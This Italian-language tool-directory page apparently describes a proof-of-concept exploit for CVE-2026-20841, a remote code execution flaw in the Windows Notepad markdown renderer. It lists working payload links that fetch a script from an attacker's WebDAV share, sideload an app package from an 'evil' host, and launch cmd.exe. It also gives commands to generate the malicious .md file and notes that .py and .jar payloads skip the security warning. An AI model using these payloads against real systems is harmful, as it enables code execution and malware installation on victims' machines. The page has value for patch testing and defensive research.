Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20841 — Proof-of-concept exploit per CVE-2026-20841, una RCE di Windows Notepad tramite link markdown. Genera file .md appositamente creati per attivare payload remoti, sideloading di app o esecuzione di binari locali. | Kitploit
Strumenti/GitHubGitHub/atiilla/cve-2026-20841
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubatiilla/cve-2026-20841

CVE-2026-20841

Proof-of-concept exploit per CVE-2026-20841, una RCE di Windows Notepad tramite link markdown. Genera file .md appositamente creati per attivare payload remoti, sideloading di app o esecuzione di binari locali.

Vedi Repository
546 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-20841 - RCE in Blocco note di Windows

PoC per una vulnerabilità di esecuzione remota di codice nel renderer Markdown del Blocco note di Windows. Il motore Markdown non limita i protocolli URL, consentendo l'attivazione di gestori di protocollo arbitrari tramite link cliccabili.

Dichiarazioni di non responsabilità

  1. Non è una mia scoperta. Il merito va ai ricercatori originali dell'avviso MSRC. Questa è una ricreazione del PoC.
  2. Gravità inferiore a quanto sembri. Richiede più di un clic nella maggior parte dei casi (vedi Limitazioni). L'ho creato perché "RCE nel Blocco note" è troppo divertente per lasciarselo sfuggire.

Vettori di attacco

1. Payload remoto (file:///)

root@kitploit:~
[click](file:///\\attacker@5005\DavWWWRoot\payload.py)

Il protocollo file:/// risolve percorsi UNC remoti. Collega un payload e Windows lo recupererà ed eseguirà al clic.

2. Sideloading di app (ms-appinstaller://)

root@kitploit:~
[click](ms-appinstaller://?source=https://evil/xxx.appx)

Apre l'Installer di app con un pacchetto .appx/.msix fornito dall'attaccante.

3. Esecuzione di binari locali (file://)

root@kitploit:~
[click](file://C:/windows/system32/cmd.exe)

Avvia qualsiasi eseguibile già presente sul disco — cmd.exe, powershell.exe, mshta.exe, ecc.

Utilizzo

Entrambi gli script generano un file poc.md con un link appositamente creato nella directory corrente.

root@kitploit:~
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
root@kitploit:~
# esempio
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md

Payload di test in payloads/.

Limitazioni

  1. Le estensioni pericolose vengono comunque segnalate. .exe, .lnk, .vbs e simili attivano un avviso di sicurezza di Windows indipendentemente dal comportamento del Blocco note.
  2. Le estensioni degli interpreti bypassano l'avviso. .py e .jar vengono eseguiti silenziosamente se Python o Java sono installati sul target.

Note

  • Le build vulnerabili del Blocco note sono disponibili su Uptodown. Verifica la firma digitale prima dell'uso.
  • Testa solo in una VM.

Stai al sicuro!

Scarica lo strumento